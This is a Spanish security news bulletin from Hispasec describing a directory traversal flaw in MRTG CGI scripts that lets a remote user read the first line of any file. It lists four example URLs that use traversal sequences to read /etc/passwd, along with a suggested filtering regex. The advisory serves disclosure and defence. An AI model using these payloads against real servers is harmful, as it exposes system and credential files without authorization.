Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Estás aquí: Inicio / Vulnerabilidades / Revelación remota de archivos con MRTG

Revelación remota de archivos con MRTG

Por Deja un comentario

Se ha descubierto una vulnerabilidad en MRTG por la cual un atacante
remoto podría obtener acceso a archivos del sistema incluido el archivo
de passwords.
Multi Router Traffic Grapher, también conocido como MRTG es un sistema
de monitorización de red, ideal para controlar y observar los consumos
de red de diferentes usuarios y aplicaciones.

Se ha descubierto una vulnerabilidad en el script cgi por la que no
valida de forma adecuada la entrada del usuario. El usuario remoto podrá
acceder a visualizar la primera cadena de cualquier archivo en el
sistema donde el script se encuentre instalado.

Se ha informado que las siguientes URLs pueden provocar la
vulnerabildiad:

http://[target]/cgi-bin/14all.cgi?cfg =../../../../../../../../etc/passwd
http://[target]/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/mrtg.cgi?cfg=../../../../../../../../ etc/passwd

Según el informe original de la vulnerabilidad se proporciona la
siguiente contramedida para evitar el problema:
$input =~ s/[(\.\.)¦\/]//g;

Antonio Ropero
antonior@hispasec.com

Más información:

Security tracker:
http://securitytracker.com/alerts/2002/Feb/1003426.html

Interacciones del lector

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.